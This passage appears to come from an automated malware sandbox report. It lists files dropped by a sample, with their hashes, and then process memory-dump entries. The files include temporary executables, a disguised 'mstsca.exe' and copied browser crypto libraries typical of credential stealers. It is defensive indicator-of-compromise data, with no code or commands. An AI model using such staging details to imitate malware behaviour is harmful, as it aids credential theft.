                  a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                  SHA512

                  c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QT2UOKDP\softokn3[1].dll

                  MD5

                  a2ee53de9167bf0d6c019303b7ca84e5

                  SHA1

                  2a3c737fa1157e8483815e98b666408a18c0db42

                  SHA256

                  43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                  SHA512

                  45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                • C:\Users\Admin\AppData\Local\Temp\3E_W1GCB.Vng

                  MD5

                  ac6ad5d9b99757c3a878f2d275ace198

                  SHA1

                  439baa1b33514fb81632aaf44d16a9378c5664fc

                  SHA256

                  9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

                  SHA512

                  bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\7A0F.exe

                  MD5

                  838ef7134f87a30f65b0087c798ab3b9

                  SHA1

                  ca97744e4263c0ef079f93adbdb1817e7e021503

                  SHA256

                  443bb42a693a17c4a6994230003e848a84a309ffbb748da22071503ae376406c

                  SHA512

                  432318aa95ad3630c61b116375da5dbad7fadbe970dce6c2f6e4889a501419e888fca0337fa588f2851b750177a500438445d3774df63193c6efd64b2a4edab5

                • C:\Users\Admin\AppData\Local\Temp\7A0F.exe

                  MD5

                  838ef7134f87a30f65b0087c798ab3b9

                  SHA1

                  ca97744e4263c0ef079f93adbdb1817e7e021503

                  SHA256

                  443bb42a693a17c4a6994230003e848a84a309ffbb748da22071503ae376406c

                  SHA512

                  432318aa95ad3630c61b116375da5dbad7fadbe970dce6c2f6e4889a501419e888fca0337fa588f2851b750177a500438445d3774df63193c6efd64b2a4edab5

                • C:\Users\Admin\AppData\Local\Temp\7C04.exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\7C04.exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\Cnq6kZ.l

                  MD5

                  aab976eaca7b12086b8c192cc00ae276

                  SHA1

                  f4ca20b2a1fc8c9bc38ac0d8ef03fcba5339199a

                  SHA256

                  f049cff5a59f04a1472ea2864147863fe32ecc4d182d1f700aa69ffcaa7a295f

                  SHA512

                  1214cb0917a2949c13bf14a418324c5ca73c21830022c40c862b5cf0eca8e6b1e2a77a59235a9ece531a680f72581375d648d290051da3988c6e829fd6efad20

                • C:\Users\Admin\AppData\Local\Temp\Wf2zlH.FM

                  MD5

                  7c5b0ef77b8e8b1bdcdd42c6c936b6a9

                  SHA1

                  e22c3b411cdd647273f20ec07888b17738584c23

                  SHA256

                  d7a78697f404013d91f5ce664d5397b9ad564b69e7241273033e9767a177d9bb

                  SHA512

                  c0c7666e7e76d6798cf152ce11b0aa0c2445f7ec9597d088a33df5bb452f68e0d790a70ced532cfae36a08f629ac343edc80ac06fed1970f732a71b016a63826

                • C:\Users\Admin\AppData\Local\Temp\j4HWCrT.QO

                  MD5

                  faaf4e3f9be054cd4b5f7929bb72fbe3

                  SHA1

                  63d347b7d60b788c6c8efc6dfc60f9f9ae75ec52

                  SHA256

                  3bf111f56e7961126cede5b6e9f80c507d96cbe814deb6eeb729b1e6ee14558d

                  SHA512

                  f98ab8858ffbfd4c73753a335f96a8b0dbb48c469a209759db2678cdc0db16ab34d8a8d83fc629535b023b66379b6fd89730423ec733807b215ab3c9ff3cefd2

                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                  MD5

                  0fea771099e342facd95a9d659548919

                  SHA1

                  9f8b56a37870f8b4ac5aa0ff5677a666f94c7197

                  SHA256

                  6f032f671284b3812373e90b0ab5b16ea737bd7dc87d22b8f2aabe558334e403

                  SHA512

                  2c1eeb2909acdc1ac36a677dba5131775e97dd107cd60f03bc6672be1791b2dd83a9f588719cb376cc4771570c6b2c202e783e30450ae3c2aa48bbaf2ee049c3

                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                  MD5

                  0fea771099e342facd95a9d659548919

                  SHA1

                  9f8b56a37870f8b4ac5aa0ff5677a666f94c7197

                  SHA256

                  6f032f671284b3812373e90b0ab5b16ea737bd7dc87d22b8f2aabe558334e403

                  SHA512

                  2c1eeb2909acdc1ac36a677dba5131775e97dd107cd60f03bc6672be1791b2dd83a9f588719cb376cc4771570c6b2c202e783e30450ae3c2aa48bbaf2ee049c3

                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                  MD5

                  0fea771099e342facd95a9d659548919

                  SHA1

                  9f8b56a37870f8b4ac5aa0ff5677a666f94c7197

                  SHA256

                  6f032f671284b3812373e90b0ab5b16ea737bd7dc87d22b8f2aabe558334e403

                  SHA512

                  2c1eeb2909acdc1ac36a677dba5131775e97dd107cd60f03bc6672be1791b2dd83a9f588719cb376cc4771570c6b2c202e783e30450ae3c2aa48bbaf2ee049c3

                • \ProgramData\mozglue.dll

                  MD5

                  8f73c08a9660691143661bf7332c3c27

                  SHA1

                  37fa65dd737c50fda710fdbde89e51374d0c204a

                  SHA256

                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                  SHA512

                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                • \ProgramData\mozglue.dll

                  MD5

                  8f73c08a9660691143661bf7332c3c27

                  SHA1

                  37fa65dd737c50fda710fdbde89e51374d0c204a

                  SHA256

                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                  SHA512

                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                • \ProgramData\nss3.dll

                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll

                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \Users\Admin\AppData\Local\Temp\1105.tmp

                  MD5

                  50741b3f2d7debf5d2bed63d88404029

                  SHA1

                  56210388a627b926162b36967045be06ffb1aad3

                  SHA256

                  f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                  SHA512

                  fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                • \Users\Admin\AppData\Local\Temp\WF2ZlH.FM

                  MD5

                  7c5b0ef77b8e8b1bdcdd42c6c936b6a9

                  SHA1

                  e22c3b411cdd647273f20ec07888b17738584c23

                  SHA256

                  d7a78697f404013d91f5ce664d5397b9ad564b69e7241273033e9767a177d9bb

                  SHA512

                  c0c7666e7e76d6798cf152ce11b0aa0c2445f7ec9597d088a33df5bb452f68e0d790a70ced532cfae36a08f629ac343edc80ac06fed1970f732a71b016a63826

                • memory/196-185-0x0000000000400000-0x0000000000406000-memory.dmp

                • memory/196-190-0x0000000000400000-0x0000000000406000-memory.dmp

                • memory/196-186-0x0000000000401AFA-mapping.dmp

                • memory/516-138-0x0000000000000000-mapping.dmp

                • memory/656-139-0x0000000000000000-mapping.dmp

                • memory/684-188-0x0000000000000000-mapping.dmp

                • memory/688-144-0x00000000049A6000-0x0000000004A38000-memory.dmp

                • memory/688-142-0x0000000000000000-mapping.dmp

                • memory/1020-219-0x0000000000000000-mapping.dmp

                • memory/1040-141-0x0000000000000000-mapping.dmp

                • memory/1356-238-0x0000000003330000-0x0000000003334000-memory.dmp

                • memory/1560-148-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/1560-146-0x0000000000424141-mapping.dmp

                • memory/1848-235-0x0000000000401AFA-mapping.dmp

                • memory/1952-149-0x0000000000000000-mapping.dmp

                • memory/1952-151-0x0000000000610000-0x0000000000611000-memory.dmp

                • memory/1952-152-0x0000000000610000-0x0000000000611000-memory.dmp

                • memory/1976-220-0x0000000000000000-mapping.dmp

                • memory/1984-163-0x0000000000000000-mapping.dmp

                • memory/2112-221-0x0000000000000000-mapping.dmp

                • memory/2172-137-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/2172-129-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/2172-130-0x0000000000424141-mapping.dmp

                • memory/2396-158-0x0000000000000000-mapping.dmp

                • memory/2448-222-0x0000000000000000-mapping.dmp

                • memory/2596-198-0x0000000000400000-0x00000000004D9000-memory.dmp

                • memory/2596-195-0x00000000004A18CD-mapping.dmp

                • memory/2596-194-0x0000000000400000-0x00000000004D9000-memory.dmp

                • memory/2676-159-0x0000000000000000-mapping.dmp

                • memory/3060-119-0x00000000008E0000-0x00000000008F6000-memory.dmp

                • memory/3140-135-0x0000000000120000-0x0000000000121000-memory.dmp

                • memory/3140-131-0x0000000000000000-mapping.dmp

                • memory/3140-134-0x0000000000120000-0x0000000000121000-memory.dmp

                • memory/3184-237-0x0000000000000000-mapping.dmp

                • memory/3472-118-0x0000000000400000-0x0000000002F02000-memory.dmp

                • memory/3472-115-0x00000000031E9000-0x00000000031F2000-memory.dmp

                • memory/3472-116-0x0000000002F10000-0x000000000305A000-memory.dmp

                • memory/3488-181-0x0000000000000000-mapping.dmp

                • memory/3488-189-0x0000000003250000-0x000000000339A000-memory.dmp

                • memory/3488-184-0x0000000003539000-0x0000000003549000-memory.dmp

                • memory/3576-224-0x0000000000000000-mapping.dmp

                • memory/3744-160-0x0000000000000000-mapping.dmp

                • memory/4412-176-0x0000000000400000-0x0000000002F75000-memory.dmp

                • memory/4412-124-0x0000000000000000-mapping.dmp

                • memory/4412-175-0x0000000004AF0000-0x0000000004BC6000-memory.dmp

                • memory/4448-223-0x0000000000000000-mapping.dmp

                • memory/4492-128-0x0000000004B10000-0x0000000004C2B000-memory.dmp

                • memory/4492-123-0x0000000004A5D000-0x0000000004AEF000-memory.dmp

                • memory/4492-120-0x0000000000000000-mapping.dmp

                • memory/4720-162-0x0000000000000000-mapping.dmp

                • memory/4888-164-0x0000000000000000-mapping.dmp

                • memory/4944-177-0x0000000000000000-mapping.dmp

                • memory/4944-180-0x0000000003309000-0x0000000003385000-memory.dmp

                • memory/4944-197-0x0000000004C90000-0x0000000004D66000-memory.dmp

                • memory/4956-170-0x0000000000920000-0x0000000000921000-memory.dmp

                • memory/4956-169-0x0000000000920000-0x0000000000921000-memory.dmp

                • memory/4956-174-0x0000000004EF0000-0x0000000004F9B000-memory.dmp

                • memory/4956-168-0x0000000000000000-mapping.dmp

                • memory/4956-191-0x0000000004FA0000-0x0000000005044000-memory.dmp

                • memory/4956-192-0x0000000005050000-0x00000000050E2000-memory.dmp

                • memory/4956-173-0x0000000004D90000-0x0000000004E3B000-memory.dmp

                • memory/4984-161-0x0000000000000000-mapping.dmp